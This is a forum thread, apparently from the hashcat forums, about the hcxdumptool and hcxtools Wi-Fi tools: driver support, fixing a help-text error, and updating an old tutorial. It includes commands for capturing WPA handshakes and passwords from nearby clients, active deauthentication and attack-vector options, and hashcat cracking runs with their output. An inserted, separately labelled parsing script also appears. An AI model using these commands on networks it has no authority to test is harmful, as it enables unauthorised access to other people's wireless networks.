Posts: 1,058 | Threads: 2 | Joined: Jun 2017
01-25-2021, 11:09 AM (This post was last modified: 01-25-2021, 12:55 PM by ZerBea.)
Your assumption is correct. I noticed that, too.
Some devices probe their entire NVRAM to hcxdumptool:
Code:
NVRAM
NVRAM WARNING
NVRAM WARNING: ERR 0x10
NVRAM WARNING: Err = 0x01
NVRAM WARNING: Err = 0x02
NVRAM WARNING: Err = 0x06
NVRAM WARNING: Err = 0x10
NVRAM WARNING: Err = 0x1p
NVRAM WARNING: Err=7x13
NVRAM WARNING: Errel WiFi
NVRAMERROR
NVRAM_Err_0x10

Posts: 33 | Threads: 3 | Joined: Feb 2019
Hi ZerBea, hope all is good. Sorry for this question, it's not really related to hashcat or hcxdumptool, just a curiosity: will hcxdumptool work with the ath10k driver? I really don't get that. Some say that injection works, some say it doesn't. I never buy a device if hcxdumptool does not work, lol.

Posts: 1,058 | Threads: 2 | Joined: Jun 2017
02-13-2021, 09:58 AM (This post was last modified: 02-13-2021, 03:27 PM by ZerBea.)
I'm fine, thanks, and I hope you're fine, too.
First a general answer:
hcxdumptool is working on every driver (e.g.: mt76, rt2800usb, ath9k) that is able to run full monitor mode, full packet injection, accept ioctl() system calls and doesn't depend on NETLINK.
Unfortunately some drivers are hit by issues (e.g. freeze/timeout on ath9k):
https://bugzilla.kernel.org/show_bug.cgi?id=207397
Now to answer your question: ath10k will not work due to firmware/driver limitations:
https://wireless.wiki.kernel.org/en/user...ers/ath10k
Code:
firmware does not support association to the same AP from different virtual STA interfaces (driver prints "ath10k: Failed to add peer XX:XX:XX:XX:XX:XX for VDEV: X" in that case)
packet injection isn't supported yet
applying ath9k regulatory domain hack patch from OpenWRT causes firmware crash (reason: regulatory hint function is never called and ath10k never sends scan channel list to the firmware which in turn causes firmware to crash on scan)
tx rate is reported as 6mbps due to firmware limitation (no tx rate information in tx completions); instead see /sys/kernel/debug/ieee80211/phyX/ath10k/fw_stats
WEP doesn't work with AP_VLANs - frames are sent unencrypted (observed on: 999.999.0.636, 10.2.4.20-1, 10.1.467.2-1)
TX speeds are extremely poor on certain chips (QCA6174 is one). A patch solves the issue in most cases
Please notice:
We are talking about Linux kernel stock firmware/drivers
https://git.kernel.org/pub/scm/linux/ker...rmware.git
https://git.kernel.org/pub/scm/linux/ker...h=v5.10.15
and not about third party firmware/drivers/patches included in special penetration testing distributions (e.g.: K A L I).
BTW:
I do not use K A L I, because I'm not a penetration tester!

I fully agree:
I'll never buy a device if I know that the kernel stock driver doesn't support full monitor mode, full packet injection and ioctl() system calls.
But sometimes I get a device to test some third party drivers, e.g. the new rtw88 stack (Realtek):
https://github.com/kimocoder/realtek_rtwifi
If you are a Linux newbie (or an inexperienced K A L I user), I can't recommend using third party or patched firmware/drivers, because you'll run into several issues (at the latest on a kernel update).

A good start to get information about drivers, driver updates, issues and chipsets:
https://wireless.wiki.kernel.org/en/users/Drivers
https://patchwork.kernel.org/project/lin...less/list/
https://bugzilla.kernel.org/
https://deviwiki.com/wiki/
But be warned: manufacturers often change the chipset, but will use the same case and customary packaging!

Posts: 63 | Threads: 10 | Joined: Nov 2017
Hello ZerBea, when using the hcxeiutool -h command and following the example listed at the bottom of the help, in the last line of the example where it runs hashcat, is the "dump.pcapng" supposed to be "test.22000" instead?
I'm assuming so, unless I'm missing something important. Thanks.

Posts: 1,058 | Threads: 2 | Joined: Jun 2017
02-25-2021, 11:05 AM (This post was last modified: 02-25-2021, 09:18 PM by ZerBea.)
Hi walterlacka.
Thanks for reporting that ugly copy and paste error.
Fixed by this commit:
https://github.com/ZerBea/hcxtools/commi...28af54dbf6

Posts: 5 | Threads: 0 | Joined: Mar 2021
(07-22-2017, 10:07 AM) ZerBea Wrote:
 basic tutorial about the features to capture passwords from wlantraffic
 1.
 Choose a place where you do expect to receive many, many clients.
 run wlandump-ng or wlanresponse for a while (one or more hours) using these options:

 on a notebook
 wlandump-ng -i <mywlandevice> -o test.cap -c 1 -t 4 -d 20 -D 2 -m 512 -b -r -l -L -s 20

 on a raspberry
 wlandump-ng -i <mywlandevice> -o test.cap -c 1 -t 4 -d 20 -D 2 -m 128 -b -r -l -L -s 0
 wlanresponse -i <mywlandevice> -o test.cap -t 3 -b -l -L

 mydevice is your WLAN device (it must already be running in monitor mode on a real device - do not use virtual devices like mon0).

 Please download and use the attached test.cap for this tutorial
 Extract and copy the cap to a folder and open a terminal inside.

 2.
 Let's check the cap:

 $ wlancapinfo -i test.cap
 input file.......: test.cap
 magic file number: 0xa1b2c3d4 (cap/pcap)
 major version....: 2
 minor version....: 4
 data link type...: 105 (DLT_IEEE802_11) [http://www.tcpdump.org/linktypes.html]
 packets inside...: 6
 last pcap error..: flawless

 The cap looks like a normal cap, but you should convert it only by using wlancap2hcx, because there is information inside that other tools are not able to strip.

 Let's convert the cap:

 $ wlancap2hcx -o test.hccapx -e wordlist test.cap
 start reading from test.cap
 6 packets processed (6 wlan, 0 lan, 0 loopback)
 found 1 wpa2 AES Cipher, HMAC-SHA1
 found 1 valid wpa handshake (by wlandump-ng/wlanresponse)

 You can see that there's a valid WPA2 handshake inside and that
 wlandump-ng/wlanresponse initiates the authentication with the client.
 No access point captured - there is no need to capture an access point to get the data!
 We use the -e option to save network names and passwords to a file (it's a good idea to use this option every time you run wlancap2hcx).

 $ ls
 test.hccapx test.cap  wordlist

 now sort our wordlist
 $ sort wordlist | uniq > wordlistsort
 you need to do this, because there are many dupes inside.

 $ ls
 test.hccapx test.cap  wordlist wordlistsort

 now run hashcat
 $ hashcat -m 2500 --potfile-path=hc2500.pot test.hccapx wordlistsort
 hashcat (v3.6.0-247-g8f2cbb26) starting...
 Session..........: hashcat
 Status...........: Cracked
 Hash.Type........: WPA/WPA2
 Hash.Target......: UPC501953949 (AP:8c:84:01:09:e9:e6 STA:bc:44:86:a1:66:82)
 Time.Started.....: Sat Jul 22 09:59:12 2017 (0 secs)
 Time.Estimated...: Sat Jul 22 09:59:12 2017 (0 secs)
 Guess.Base.......: File (wordlistsort)
 Guess.Queue......: 1/1 (100.00%)
 Speed.Dev.#1.....:        0 H/s (0.36ms)
 Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
 Progress.........: 2/2 (100.00%)
 Rejected.........: 0/2 (0.00%)
 Restore.Point....: 0/2 (0.00%)
 Candidates.#1....: AXNDFNEU -> UPC501953949
 HWMon.Dev.#1.....: Temp: 42c Fan: 28% Util:100% Core:1303MHz Mem:3004MHz Bus:8

 Take a look into the potfile and you can imagine what's going on.
 You cracked the hash, using the captured password from wlantraffic.

 It's a good idea to add/copy/cat the wordlist to your wordlist(s) - every time you run wlancap2hcx on new cap files.

Hello ZerBea, I hope you are doing well.
I tried to understand and reproduce this exact same procedure in the hope of recovering the PSK if it's present in the network traffic. As these tools are not available anymore, because they have been updated to the latest hcxtools, I am unable to reproduce this.

Can you please update this exact tutorial using the latest set of hcxtools?

regards.

Posts: 1,058 | Threads: 2 | Joined: Jun 2017
Thanks, I'm fine and I hope you'll be fine, too.
hcxtools > v6 and hcxdumptool make life a little bit easier and received a lot of improvements, but the basics are the same (that includes filter modes, filter lists and Berkeley Packet Filter). Only the default formats changed to pcapng.
capture traffic -> convert to hashcat (or john) hash format -> run hashcat (or john)

The same applies to the attack vectors:
attack vector 1 target AP (PMKID)
attack vector 2 CLIENT (M2)
attack vector 3 AP <-> CLIENT connection (PMKID, M1, M2, M3, M4)
attack vector 4 EAP (EAP-ID, EAP TLS, RADIUS)
or any combination of these.
Code:
attack vector 1, 2, 3, 4 (request EAP-ID, only)
$ hcxdumptool -i interface -o dump.pcapng --essidlist=beaconlist --active_beacon

attack vector 2 (request EAP-ID, only)
$ hcxdumptool -i interface -o dump.pcapng --essidlist=beaconlist --active_beacon --disable_deauthentication --disable_ap_attacks -t 300

attack vector 1, 3
$ hcxdumptool -i interface -o dump.pcapng --essidlist=beaconlist --disable_client_attacks

for attack vector 4 please read --help
If you're an experienced user (you know what you're doing, you are able to create a BPF, you don't need a beautiful real time status display), I recommend using hcxlabtool from the wifi_laboratory series.

The basics of converting traffic to hashcat/john formats are the same, too, except that the default formats changed:
hcxpcapngtool:
default hash format now -> 22000 EAPOL + PMKID
storing possible PSKs received from WiFi traffic can be done by -E -I -U

Example dump file is here:
https://github.com/evilsocket/pwnagotchi...nctest.zip
$ hcxpcapngtool -o eapol.22000 -E wordlist test.pcap
$ hashcat -m 22000 --nonce-error-corrections=8 eapol.22000 wordlist
In this example, we must use --nonce-error-corrections=8, because I converted the original pcapng file to cap/pcap format (a few tools don't understand pcapng). This format is a very basic format and we lose some important information stored in pcapng format.

hcxhashtool is new. Depending on the options, you can filter the output hash file. That can be done by bash tools, too, because 22000 is no longer a binary format.
hcxeiutool is new. Depending on the options, you can pre-process hcxpcapngtool -E -I -U output to a raw word list that can be used in combination with rules.

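As an added example (not part of the post above and not code from hcxtools), this is what "filtering the 22000 output with bash tools" looks like: the line layout is the one hashcat documents for mode 22000 (WPA*TYPE*PMKID-or-MIC*MAC_AP*MAC_STA*ESSID*ANONCE*EAPOL*MESSAGEPAIR); the sample lines, MACs, hashes and EAPOL bytes are constructed, and only the low three bits of MESSAGEPAIR (the hccapx message_pair code) are decoded.

```shell
#!/bin/sh
# Added example (not from the thread): parse and filter hashcat 22000 hash lines
# with POSIX tools only. Fields are separated by '*':
#   WPA*TYPE*PMKID_or_MIC*MAC_AP*MAC_STA*ESSID_hex*ANONCE*EAPOL*MESSAGEPAIR
# TYPE 01 = PMKID line (last three fields empty), TYPE 02 = EAPOL/MIC line.
# The three sample lines are constructed (fake MACs, hashes and EAPOL bytes);
# ESSIDs are "labnet" (6c61626e6574) and "othernet" (6f746865726e6574).
SAMPLE_22000='WPA*01*0123456789abcdef0123456789abcdef*001122334455*66778899aabb*6c61626e6574***
WPA*02*fedcba9876543210fedcba9876543210*001122334455*ccddeeff0011*6c61626e6574*000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f*0103005f02010a00000000000000000001*02
WPA*01*0123456789abcdef0123456789abcdef*aabbccddeeff*66778899aabb*6f746865726e6574***'

# Decode a hex string on stdin to ASCII (portable awk, no xxd needed).
hex_to_ascii() {
  awk 'BEGIN { h = "0123456789abcdef" }
       { s = ""
         for (i = 1; i < length($0); i += 2)
           s = s sprintf("%c", (index(h, substr($0, i, 1)) - 1) * 16 + index(h, substr($0, i + 1, 1)) - 1)
         print s }'
}

# Keep only well-formed lines for one ESSID (plain text) and an optional type.
# Usage: filter_22000 ESSID [01|02]
filter_22000() {
  e=$(printf '%s' "$1" | od -An -tx1 | tr -d ' \n')   # ESSID as hex, like the file
  printf '%s\n' "$SAMPLE_22000" |
    awk -F '[*]' -v e="$e" -v t="$2" \
      '$1 == "WPA" && NF == 9 && $6 == e && (t == "" || $2 == t)'
}

# Print one human-readable line per hash line read from stdin.
describe_22000() {
  while IFS='*' read -r tag type hash ap sta essid anonce eapol mp; do
    [ "$tag" = "WPA" ] || continue
    name=$(printf '%s' "$essid" | hex_to_ascii)
    if [ "$type" = "01" ]; then
      printf 'PMKID  ap=%s sta=%s essid=%s\n' "$ap" "$sta" "$name"
    else
      # low 3 bits of MESSAGEPAIR carry the hccapx message_pair code
      case $((0x$mp & 7)) in
        0) pair="M1+M2" ;;  1) pair="M1+M4" ;;
        2|3) pair="M2+M3" ;;  *) pair="M3+M4" ;;
      esac
      printf 'EAPOL  ap=%s sta=%s essid=%s pair=%s\n' "$ap" "$sta" "$name" "$pair"
    fi
  done
}

filter_22000 labnet | describe_22000
```

Pointing the same awk at a real hcxpcapngtool output file instead of SAMPLE_22000 gives the per-ESSID subset that hcxhashtool would produce, without the binary-format handling hccapx needed.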
Posts: 5 | Threads: 0 | Joined: Mar 2021
(03-31-2021, 10:12 AM) ZerBea Wrote: Thanks, I'm fine and I hope you'll be fine, too. [...]
Thanks for such detailed information, it cleared a lot of doubts, much appreciated!
However, when I run hashcat with attack mode 2200 ($ hashcat -m 22000 --nonce-error-corrections=8 eapol.22000 wordlist) I get an error message stating that there is no module named module_02200.dll (Cannot load module ./module/module_02200.dll). I have checked the modules directory and it is not there for some reason. I am using the default hashcat version 6.1.1 provided by hashcat.net on Windows.

Btw, I also tested this with hashcat version 4.1.1, same error.

Posts: 1,058 | Threads: 2 | Joined: Jun 2017
Maybe you're running an old version of hashcat.
hashcat 6.1.1 supports 22000 and 22001.
hashcat 4.1.1 is ancient.
Code:
$ hashcat -m 22000 --benchmark
hashcat (v6.1.1-144-g9e474e1e8) starting in benchmark mode...
CUDA API (CUDA 11.2)
====================
* Device #1: GeForce GTX 1080 Ti, 10875/11175 MB, 28MCU

OpenCL API (OpenCL 1.2 CUDA 11.2.162) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #2: GeForce GTX 1080 Ti, skipped

Benchmark relevant options:
===========================
* --optimized-kernel-enable

Hashmode: 22000 - WPA-PBKDF2-PMKID+EAPOL (Iterations: 4095)

Speed.#1.........:   620.7 kH/s (90.65ms) @ Accel:32 Loops:256 Thr:1024 Vec:1

Started: Wed Mar 31 18:33:56 2021
Stopped: Wed Mar 31 18:33:59 2021

Posts: 5 | Threads: 0 | Joined: Mar 2021
03-31-2021, 10:36 PM (This post was last modified: 03-31-2021, 11:53 PM by sata.)
(03-31-2021, 06:37 PM) ZerBea Wrote: Maybe you're running an old version of hashcat. [...]
Thanks, I downloaded the latest hashcat and installed it again, it worked!